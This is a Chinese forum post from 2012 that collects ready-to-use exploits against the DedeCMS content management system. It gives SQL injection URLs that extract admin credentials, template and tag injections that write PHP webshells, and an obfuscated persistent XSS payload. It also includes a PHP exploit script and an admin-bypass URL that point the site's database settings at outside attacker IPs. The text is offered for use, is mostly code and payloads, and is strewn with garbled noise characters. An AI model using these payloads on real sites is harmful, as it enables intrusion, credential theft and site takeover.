dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞
+ ^+ O6 g) l0 _http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
. G: r- L5 u* _" R. K$ }, C; Q2 W. v+ G3 [9 F1 h$ C
0 w0 K! b& w- J& [1 I& A
0 N; [  o$ a+ N) W  s

/ y/ u" m; a5 h, a5 o: w$ w  Y6 E* M7 H7 K4 M" \+ d

# l& v" M2 Y. W2 O& y* d5 r% Y3 B6 i- v% _# u( u/ z

" o: D, c  T2 `. b$ d' l) M: ]# ^) JDedeCms v5.6 嵌入恶意代码执行漏洞. K0 P9 a6 a4 _( d% C
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
- \6 k& F( F1 s; h发表后查看或修改即可执行( p# K/ f. W( c
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}# I9 A2 X0 V0 v4 @
生成x.php 密码xiao，直接生成一句话。! t* Y) d6 }+ v

, C+ t0 U( g3 |, v3 P* X+ h# C
1 Y' o. n& s/ D# D4 {9 F) e0 F; I4 G( Z
$ R5 p2 [8 B; }

4 P2 x, m+ c: d- h0 Q
; E3 z) S, M: l
5 F6 M9 O7 D. M% t
, y4 R& q5 e1 Q5 l6 a  Y3 C+ {Dede 5.6 GBK SQL注入漏洞7 Z4 ]* ]& G3 o% E) o
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
5 I/ ^& z" u- e, `& m+ w3 `: Rhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
" W$ B: `' [5 o7 m0 bhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 7 F3 f+ ~" U$ |. k5 ]
) w, Y- k" Q4 H# r8 P  Q' U$ ?2 a/ q
' ^) g3 _. C1 R
6 J3 b/ l  M& ?: I. t* u

9 W( Z) \. }4 N5 r7 C; J$ \8 o1 V, A5 d. j  o3 g
3 [! X. J+ \: Y1 _/ R$ x5 X
DEDECMS 全版本 gotopage变量XSS漏洞, C7 w: M: Y5 q4 ~' ]/ i  D
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
" q  _# o5 L3 q; K3 s* T& Y+ ~http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
( N: m! `- _6 f
: R0 \' W" t0 |1 S( J3 i) E7 W/ V  j- h
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 + G6 I/ U* l% S+ }5 R3 a
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell, a8 T" I# h. T( I# U7 `  b
#!usr/bin/php -w
+ ~* m9 y4 B1 l2 @( t  X8 I<?php
2 K7 L! [. p1 t+ |error_reporting(E_ERROR);
' ]+ q5 b+ B% m. r" }/ v8 pset_time_limit(0);
) U& B1 W- x% yprint_r('# f+ j0 w& C3 z* v2 ~1 a
DEDEcms Variable Coverage
/ }0 C7 t( G8 J2 AExploit Author: www.heixiaozi.comwww.webvul.com
);, C( _& y4 M* C; s) ^! s
echo "\r\n";3 u* I  U( `# @% S; `" O! r3 T$ b
if($argv[2]==null){
1 v: {' v# M$ R. @4 U7 e0 eprint_r('( z$ R6 m  Q3 ^! @# B
+---------------------------------------------------------------------------+
5 C( v  R8 P% V' e& r' ~Usage: php '.$argv[0].' url aid path
7 e" H1 W( i, A4 @, O. Maid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/! {' b) f/ j  c
Example:
" S# N1 V( N" [3 C. w. cphp '.$argv[0].' www.site.com 1 old+ m+ D% M& I# z- `& A, i4 K7 E
+---------------------------------------------------------------------------+
3 @5 @- R; V, r9 |, @$ d');) q- Y! r' y3 t5 ^3 R
exit;/ l9 \3 c: S) x0 Z; E) R5 \5 E
}2 z5 N( f! X" k+ K
$url=$argv[1];
5 l- ~1 c9 ]  k: M% _& \- H$aid=$argv[2];
- `9 |/ |8 c. [# {; X, s; Y2 c3 A$path=$argv[3];
/ h' Q& w+ j+ M3 N0 ]$exp=Getshell($url,$aid,$path);- X6 A/ x( Z' D1 L3 @
if (strpos($exp,"OK")>12){) j& q" R  w6 A
echo "
0 k! S2 q8 R4 R) l2 PExploit Success \n";
) y; c; w* g, j3 j: H, tif($aid==1)echo "
' E! J6 \5 w7 k: E% U: s% bShell:".$url."/$path/data/cache/fuck.php\n" ;

0 T2 j+ G# _: `. I5 y$ F
* |1 g+ b0 _3 @% M4 i- i* B) Sif($aid==2)echo "
) J: I& C7 E, T* e& B$ `% u8 p. z" AShell:".$url."/$path/fuck.php\n" ;& Q; U" s: J( N; k' d+ H, `3 a
3 }; @9 ~) ]6 t2 _3 E$ S
8 M. a1 P/ f/ \0 b2 {. y% {' {7 N+ I
if($aid==3)echo "( }; V2 j3 P1 K/ O/ B  N
Shell:".$url."/$path/plus/fuck.php\n";% a5 e; g9 D9 }5 U  G- b
6 M7 s& C1 {# T6 S

+ c1 \7 F/ i( b9 N}else{1 q) m) Y% K. M" V* D7 O. F. x/ \
echo "
+ n/ I) f, G. j) ]Exploit Failed \n";
9 z; y5 s3 ]* Q5 h) r1 D- U}
6 R& N: U& y8 S4 d8 C" r% Ffunction Getshell($url,$aid,$path){
7 W  \5 L% n% l& S+ n$id=$aid;
0 ~( K/ t8 Y% M: }- z8 E$host=$url;
6 l  ~4 j' l" F: ^( X$port="80";
; c& Q/ [  J) M* c8 w9 g$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";8 E  `% j6 ~1 D6 F- Y( S
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";* a& G$ H4 p: G3 x% y- D
$data .= "Host: ".$host."\r\n";
; f4 A: |+ U7 [$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
' i, l# ~$ D  S$ ]' l* E5 S7 X# B$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
4 m9 Q: ?9 J5 b& O. ~% f0 S$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";  t0 b; w0 M+ F; e
//$data .= "Accept-Encoding: gzip,deflate\r\n";8 m7 j. u4 p1 \) K
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";, c- z- W  U5 W; r. @# D) ?
$data .= "Connection: keep-alive\r\n";
' ?4 n! e: d+ I' n" {$data .= "Content-Type: application/x-www-form-urlencoded\r\n";* ], w4 x( o% ^, v$ n
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";4 N: N* T( E4 |( S6 K1 A& a+ [
$data .= $content."\r\n";
8 r# z( A: X/ S6 c& z5 A# {' ]+ C$ock=fsockopen($host,$port);. [  I1 B7 K6 e2 g
if (!$ock) {
! k5 E. [) T5 C! B! _5 `& [echo "/ f' d' c, b, [+ Y
No response from ".$host."\n";; `) `+ r0 {8 z& L+ [. m. g
}) ?/ w$ g; r4 @' D5 {' B3 t
fwrite($ock,$data);
1 F2 d. d& A1 F( Vwhile (!feof($ock)) {9 S! A, g3 @  `9 A& D5 X; }7 [
$exp=fgets($ock, 1024);3 ?2 d6 G; J/ t9 ~$ E) t" Z& t: a2 n# J
return $exp;
& a- ~& ?# U* P6 J: I; T}- j0 y/ o' D  a
}
  {8 I! U4 s! j  B6 q: G
0 P1 ?2 o0 d* `9 X# n
, C) M# k/ S, }9 K+ Z?>) ~: ?. Z' ~, K0 G  W' u2 |

+ x1 d+ |2 \  u6 l$ y7 s
2 G, T; ^0 p5 d
* s- n2 w) k. {' y2 w9 s& b8 }1 i
/ v# I, |7 l+ G5 A6 `5 ^0 d4 ?; F) W+ m7 z) y

4 f) R0 f) [6 ]8 K
2 i8 _* m' J4 n4 u

6 h8 R, F9 J; z9 R* d/ [! U
, v3 z+ @& n* ]DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)! `7 m+ p# L% Z; o( E/ h; u
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
; i' M7 |& c" _8 V
8 o% c" h8 B9 B6 {3 B3 D
/ Q1 `$ b4 F& {把上面validate=dcug改为当前的验证码，即可直接进入网站后台
8 N# A5 x0 X* j) ^/ Q1 O+ ]  z% C- _

' |# y& p1 A% B4 a此漏洞的前提是必须得到后台路径才能实现4 w, _# ^7 `, S4 i
0 |! T& N7 E3 D# K+ \* U3 A
1 a( |# [- {: E8 v+ ^

3 o% c3 z" J! e2 p) P; k$ g" d  Z  Q- m! Q1 A

9 ^/ p% r. [8 ^1 c( Z0 v6 ?8 M: p. Y

$ w7 R0 j  _+ d
. R) j4 ^# ~! ~. t
6 m$ X, K5 N: P3 O! S0 w( P% G
Dedecms织梦标签远程文件写入漏洞  f! F1 q, u, ?
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
2 {: ^* H) {0 G- q6 b+ g
- G5 F0 D+ Y/ o6 R' f$ U9 G# n0 M  A, {0 R5 h
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 ) _* `2 {  }/ n
<form action="" method="post" name="QuickSearch" id="QuickSearch">" [0 \; Q4 [9 I$ O; a' J- d- `
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />  H1 s2 k+ i. f$ H% s0 l0 C
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
1 i( S# j" P* L0 ?0 v" a* {<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
: X7 o' d5 w9 E; @<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
* x6 @5 X, V4 o7 {* t4 o4 R<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
. \- u* I. @2 j- P# ]<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
* f: b/ O5 n4 f: r' Q. L<input type="text" value="true" name="nocache" style="width:400">
2 e2 r5 A" Y5 g- L<input type="submit" value="提交" name="QuickSearchBtn"><br />$ S  a9 @& K1 J
</form>
5 {) f( z- i/ g5 Y; ^6 v<script>
1 @! M7 J5 q1 [0 f+ ]# j2 sfunction addaction()! r3 b( t- }: x. c
{5 {* r- D& u' J9 t3 U: @1 L
document.QuickSearch.action=document.QuickSearch.doaction.value;+ G$ q/ K( V- [# I" ]
}
5 k  m8 L( K2 I  P</script>7 D7 N: P* [5 `8 C' y/ s1 O

/ Y0 m% ?, B& o5 u! y. Y- I+ k' S$ u
9 [& v+ M, d2 I  S. ~

  d4 [$ {5 f* S  t' E9 |4 s3 J) p3 O$ m$ q

/ C; i# {) t) m2 j+ o# T- l5 }6 a+ n% T5 Q. W
: I' E# J# Z* P+ W4 X+ ~4 q* U+ u
& K# r# v* a, H! q( R) i
/ L/ w1 B( `+ U3 `
DedeCms v5.6 嵌入恶意代码执行漏洞
* v% k8 t/ M+ N! b% [3 P% X+ F注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行6 O: @3 K: |$ C1 `/ P
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
  \% w0 u  G) [$ \' y# |, F生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得+ s# U0 Q6 x! P  ^# g: f- Z
Dedecms <= V5.6 Final模板执行漏洞* j  E/ d& u1 X8 `+ `# m
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：3 M# a" _6 K4 K; w/ X& p' X
uploads/userup/2/12OMX04-15A.jpg
+ l9 Q8 p# N; \" c; [3 f0 B
: ^, V1 a# d, l/ c8 c* p8 X6 D- T
1 e9 o0 ?% m- D# w% l  f模板内容是（如果限制图片格式，加gif89a）：+ a  z9 j/ F, U1 N
{dede:name runphp='yes'}# w0 w+ c6 g8 F7 @
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
; N2 [; S, @; y% g' j@fclose($fp);
7 `  }2 I: J+ H{/dede:name}# U- f6 ^1 u4 g6 N
2 修改刚刚发表的文章，查看源文件，构造一个表单：
  j4 A. D* P2 [  l4 {<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
" \# D% Q. i5 z3 N  `4 h<input type="hidden" name="dopost" value="save" />
8 A$ T6 A# ?' \( }! E, ?<input type="hidden" name="aid" value="2" />
' v5 L" A( A: T9 n8 `+ e<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />5 U1 T. t) A3 V# T$ g" e$ n* v$ s
<input type="hidden" name="channelid" value="1" />
& X6 V2 d) f$ ?4 D# h6 ?$ z* B<input type="hidden" name="oldlitpic" value="" />
# Y; y! ~7 ?& `: w4 Z<input type="hidden" name="sortrank" value="1275972263" />4 D6 `6 `8 u% h! k* m2 v+ i
% e- u! g: Q- u- P. P5 {- l

4 a3 |& o6 M8 i<div id="mainCp">7 ^9 u6 n% o  e2 k# d' R
<h3 class="meTitle"><strong>修改文章</strong></h3>
+ {3 d% e8 U2 a: L5 s$ K: ?8 J% |0 g7 q0 W6 p- U1 z/ |

+ ?7 ~% m' z& L- A<div class="postForm">
  p# |: q" n+ J% O$ y8 G* v<label>标题：</label>+ J! ^7 P! k3 M3 Z. B
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
2 M* j5 S% }2 \: c& i0 Q; @6 O9 s, [. T- i4 u
8 Z- f9 N, e& N* f
<label>标签TAG：</label>( @. Z( Y( ^& S' Q1 `
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)/ _4 e5 B  a1 @

/ a! |1 s8 V, s2 b
1 ~3 K% q8 B! n<label>作者：</label>
) ^0 ?: k" D- Z2 C) ?& [<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>- k" q3 z3 l- w) d5 q) V8 o

! _0 I- ^* }9 l+ d" J4 ?5 c: C& e
<label>隶属栏目：</label>! K& l0 ?/ J' v( S! r' u" `8 c4 J3 t
<select name='typeid' size='1'>
% e& m" s  u  W<option value='1' class='option3' selected=''>测试栏目</option>% n* a# M+ m% c5 v: I
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
6 r, F+ [+ B' f) @! M9 |9 {) W9 x8 g; r1 F$ m

7 a9 a5 I% q% e6 d6 Y$ N: ~/ R8 \<label>我的分类：</label>/ N/ O. @. L* q
<select name='mtypesid' size='1'>5 h& c: X' x" G
<option value='0' selected>请选择分类...</option>! h& s- n. y. [% e7 M. a
<option value='1' class='option3' selected>hahahha</option>
4 C: Q. K* G* W* C</select>
' t7 o" e' k6 }$ k" M1 D5 u8 S
$ n* o8 ?! T5 s7 r
9 s5 H; I- `' ^8 L& g" o<label>信息摘要：</label>7 q9 w7 x9 k5 J
<textarea name="description" id="description">1111111</textarea>
3 N( y+ |7 i& B# A  d# V! m; L(内容的简要说明)
$ Q: A. ^5 j( O1 f, e* O  E- n% S4 r$ `. e

6 m" Z8 h9 L+ \) N9 @- A  z<label>缩略图：</label>- A- |5 V7 v" H: W
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>) g- \" w! {0 P, r# R: ]
9 J/ \0 ^. _  q
, u+ U& h( ^' p* x0 K2 A8 k$ p
<input type='text' name='templet'0 P* R5 v  ]& z/ E3 t) R( N
value="../ uploads/userup/2/12OMX04-15A.jpg">+ f# p7 y0 M. U6 N$ Z# `5 @
<input type='text' name='dede_addonfields'# a( I+ O: D9 \
value="templet,htmltext;">（这里构造）8 h/ p) K1 H) \9 w/ p
</div>
$ j2 y# y; A6 t4 \# Z5 I' u0 {' Z5 M# U+ o1 t$ a3 ^

; L" W$ U+ `  D0 J4 m( p
+ i. |0 _3 u4 Y) ?: l0 g# H( ?0 l) {7 U<h3 class="meTitle">详细内容</h3>
8 A, ]9 ~2 z; g+ g8 `  G1 n3 J8 ~* x/ J7 R# I( V9 V1 }
: ^$ Q" m0 m: R: d- C$ b
<div class="contentShow postForm">( U- z% f. Z1 i8 b0 a5 Q
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
& U1 X/ `4 ?5 H1 ?. p( `& _8 S" l  g7 e6 \& Q
% @. a  c; B0 M, ^
<label>验证码：</label>
$ d: p% v6 }: z  f2 J<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
# c4 ~! [; b, j6 G  l; E  O) z<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />( ]4 h+ u: u0 n& F- W7 s
$ H7 h/ L: a& |3 \2 u0 B& T
5 a! D7 X8 L! O( {3 I7 r! D9 l
<button class="button2" type="submit">提交</button>6 A* ?* b- G' I/ {0 F
<button class="button2 ml10" type="reset">重置</button>
; j+ S% S6 f" x" L: A</div>- ^& E2 @% {1 F1 D# D

# m, Z" @0 M! O3 E4 j3 d- v. I3 s6 @( }8 X1 F
</div>1 c2 Q3 u: z9 L  k+ [( S

$ S% T- O4 [4 D5 M" _  g7 f. c. Q6 ~; L1 B
</form>
: I6 p. h& ~! s  n) _
; Q# w0 K$ O. z# }' |
# m/ g4 Z+ p$ Q, u提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：# k, T! ]7 H3 ?) a9 O
假设刚刚修改的文章的aid为2，则我们只需要访问：! ?: P% b( |! }8 T& G
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
& M& W* j& f2 O+ N- P# E
* y$ W6 [& Y/ P# H9 \( R1 K5 D+ {' G
$ ^7 U* U7 h' |2 s' b. O, \
' {  I  Y4 R7 n3 j. r1 y
! d# D# S! C6 @' W& s. L4 j# l/ z
$ D$ q9 K( Q# I5 i) C  H
; l# G( [& B/ I) v$ Q! [
6 i4 y3 W$ `1 v3 @" p% G; w6 v+ R8 d, i% j! R# i! w7 f8 W
. U' o$ I. R% M* `8 n5 G
$ x4 k$ z* p6 S2 p

/ S) s6 D- [/ ?! m: V- e) N% d7 m  |1 ?9 b
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)3 X" a9 R. n' Z) [6 P
Gif89a{dede:field name='toby57' runphp='yes'}
2 j( r( v+ p- Tphpinfo();# H% [( X4 R6 k6 d+ \( u' Y# U
{/dede:field}
% l/ y$ G9 }5 U5 U3 k' g保存为1.gif
( j" i4 G: k  ]<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> * b1 M* z( N, k, C6 w
<input type="hidden" name="aid" value="7" /> & d& Y2 s, m* l; Q
<input type="hidden" name="mediatype" value="1" />
& N* b# x2 s& ?- O* d5 z1 Z<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
, v8 X# @1 ]8 h7 j' J0 F<input type="hidden" name="dopost" value="save" /> ; _: m  p; P! |7 d! @
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
! t- J3 Z, X3 ]  @<input name="addonfile" type="file" id="addonfile"/> ( n/ M5 h# I* c5 C
<button class="button2" type="submit" >更改</button> 1 L5 g& T/ B4 Y5 D. _
</form>
2 s, p2 A8 }" b5 K+ |/ F" h% I! d& n& S# ^* R2 R& I) v; a

4 K- l1 Q  G% W7 @* k! s& @* V构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
) [7 `- y, [+ ~发表文章，然后构造修改表单如下：2 \' p1 g6 Y6 `8 N3 O4 v
2 B# {' V1 X  O1 f/ I6 t8 C1 B

. b9 S7 H: _0 p<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
6 T( f7 x/ W) S" _, c! Q<input type="hidden" name="dopost" value="save" />
( U; y1 E, ]/ B9 P/ u<input type="hidden" name="aid" value="2" />
$ T7 E9 x' Z4 I# z3 ?3 ?6 R<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
2 S+ ]1 k; w9 S9 M<input type="hidden" name="channelid" value="1" /> % q) Z) R- U* @2 X! Z7 D
<input type="hidden" name="oldlitpic" value="" />
! c9 W$ X% y* d% X. y! ]<input type="hidden" name="sortrank" value="1282049150" /> & r: C. w$ _2 v4 s
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
1 W  _. B- O. v$ [<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
! Q! X8 l$ R- ^8 S<select name='typeid' size='1'>
0 b5 I8 o" j1 r8 W/ p0 o* H<option value='1' class='option3' selected=''>Test</option> ; d4 K  p( X6 b* s- O: w  y
<select name='mtypesid' size='1'>
. K* s0 D% t* A0 V" T# p7 T) ~<option value='0' selected>请选择分类...</option> ! f2 z$ \9 s! Y1 ]  a) d2 }3 \
<option value='1' class='option3' selected>aa</option></select> ' \% Q+ a) D: d3 A& b- a  ^$ A: L
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
* n, ^7 u1 [+ n! L: k4 H# [<input type='hidden' name='dede_addonfields' value="templet">
/ M! C( f4 D; p) `& Z<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> ) M. Q) B% h2 `
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
3 H) _/ D0 {! z6 v) H+ E1 k: m<button class="button2" type="submit">提交</button> 3 ^  \+ z2 e  F: a8 D" _
</form>
5 L. S: q9 U; ^* |' n9 f" R3 w0 I: O/ ~$ e* a6 M1 v% \3 _/ ~
/ w- O. ^' n' r* Q$ H

4 f- C, d: I  Y. x, M  l' I/ F- j
1 O" b8 d$ Y7 X7 K
  [' m- n1 |" m' m: a+ i
6 V8 g% t4 o+ k; e/ c& w

' s# D4 @7 U% R+ G0 h; G/ f  M5 @; j( C, B
% `1 C2 E$ O! @1 |8 H( n
3 \/ V" f, o: w  o( L3 k& g4 U* F4 V

6 Z; y, K1 p$ J织梦(Dedecms)V5.6 远程文件删除漏洞
- b# o! @+ @6 g) [; o* }# k7 ohttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 # i$ t7 x& e. e$ f! }
http://www.test.com/plus/carbuya ... urn&code=../../
1 T6 |% p/ W0 T1 `* @+ v: g; q$ _6 \1 @6 O% {+ D0 e: q2 C8 I3 p
: A* Q3 S  M# d

& A4 N6 y+ ?- X- A$ F/ u" l, Z) n) }- Q. b% M' M

6 J6 u' q/ [3 W: g  P
+ F, b2 P1 s0 j! j* T
3 B& @; k: a+ Y& |& A7 ~/ S8 v7 w. U

" u: [+ A9 l* P+ H# @' H0 f5 E+ ?. w: r: F) F' n0 ~- u
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
# l! X2 L( \6 s4 K( f6 Y9 Q0 M1 d- \plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`2 X5 S) y4 k+ p/ x% _$ |$ P3 a1 `
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
0 n5 G/ t0 p% p' [: b! w6 L' L
* p! [2 ~' a" |  w$ M0 x" W/ [4 I/ C1 \
0 n% v  `. u  m' J6 N
1 Q" s+ u6 l9 ~8 o, U7 J

* C( D, i; N- c9 \' ]0 I* y; [6 U3 S  a6 }9 _1 [! x, n4 t
& {2 \) S8 O) y; ~" }8 R- M' k' o

  L! R* X$ Y; v/ C2 L% d
( ]' _" R; S: M& @
. j. ]( e* M' H2 e6 D6 \织梦(Dedecms) 5.1 feedback_js.php 注入漏洞# v; n. |/ V' v) U! P0 \1 @: k
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='7 D9 P# s6 m" `/ O- F+ [
# t* f* f, C" O5 G9 w

3 E$ C9 Z9 n3 F& @% Q+ Y6 ^" S) L% l( o" R

$ a) D' B, z) B$ O' l7 m9 A# H, F  p5 i7 L% M1 t2 U  g: R
; D, ^+ |4 [: w$ S7 p1 S
. H; Y! v: X! [" K: {6 i

- X3 Z8 i5 z2 h9 t& _9 n' E$ G$ s$ N& l
. y: n  m6 E7 P% _
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞  F: g$ r# Z$ u0 X1 T! j" j
<html>) `9 B! ?: l% Z; u9 \- ?- O
<head>& h% r8 a% ?+ x/ b# a9 p
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
6 g+ W; Q9 ~: a$ ^8 Z/ T3 D" E</head>/ M9 S' w0 Q2 i4 O7 w( O2 d8 w) i
<body style="FONT-SIZE: 9pt">. d8 @$ q6 K( T  [: V, ?
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
9 o: S3 n6 n/ ]8 w; Z  n4 l- f<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
# Z) I+ ~$ t' }<input type='hidden' name='activepath' value='/data/cache/' />, x' j+ l- K/ h4 g; L
<input type='hidden' name='cfg_basedir' value='../../' />& ^( a- [0 N  k% M) e7 z
<input type='hidden' name='cfg_imgtype' value='php' />
+ r, O3 M- I- N$ M: }( W<input type='hidden' name='cfg_not_allowall' value='txt' />
8 ?2 @6 Y5 \+ Z2 k* V  _, Z& E. U<input type='hidden' name='cfg_softtype' value='php' />3 M: B% q- x' U
<input type='hidden' name='cfg_mediatype' value='php' />& b3 D/ b3 J1 u2 x4 R
<input type='hidden' name='f' value='form1.enclosure' />1 S+ Z. [$ G. v$ s, n7 |
<input type='hidden' name='job' value='upload' />
, R4 v# \$ a+ ]) W/ D: W: G+ j7 {  a<input type='hidden' name='newname' value='fly.php' />
